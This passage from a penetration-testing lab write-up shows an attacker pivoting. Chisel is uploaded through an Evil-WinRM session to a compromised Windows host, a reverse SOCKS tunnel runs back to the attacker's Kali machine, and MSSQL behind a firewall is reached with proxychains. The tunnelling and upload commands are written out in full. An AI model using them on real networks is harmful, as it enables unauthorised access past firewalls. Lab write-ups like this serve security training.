MSSQL


There is an MSSQL instance running on the target port 1433. Since the port is blocked by the firewall, I would need to tunnel it in order to access it from Kali.

Tunneling with Chisel


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ chisel server -p 55555 --reverse --socks5 -v
2025/04/23 21:35:34 server: Reverse tunnelling enabled
2025/04/23 21:35:34 server: Fingerprint bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=
2025/04/23 21:35:34 server: Listening on http://0.0.0.0:55555

Starting a Chisel server on Kali Grabbing the fingerprint; bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> upload chiselx64.exe
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/chiselx64.exe to C:\Users\Christopher.Lewis\Documents\chiselx64.exe
Data: 13014356 bytes of 13014356 bytes copied
 
Info: Upload successful!

Transferring Chisel via the established WinRM session

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> Start-Job { & "C:\Users\Christopher.Lewis\Documents\chiselx64.exe" client -v --fingerprint "bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=" 192.168.45.220:55555 R:48823:socks }
 
Id     Name            PSJobTypeName   State         HasMoreData     Location             Command
--     ----            -------------   -----         -----------     --------             -------
1      Job1            BackgroundJob   Running       True            localhost             & "C:\Users\Christoph...

Connecting to Kali

Session established

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ sudo proxychains4 -q nmap -sT $IP -p1433
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 21:00 CEST
Nmap scan report for nagoya.nagoya-industries.com (192.168.158.21)
Host is up (0.031s latency).
 
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
 
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

The target MSSQL instance is now accessible from Kali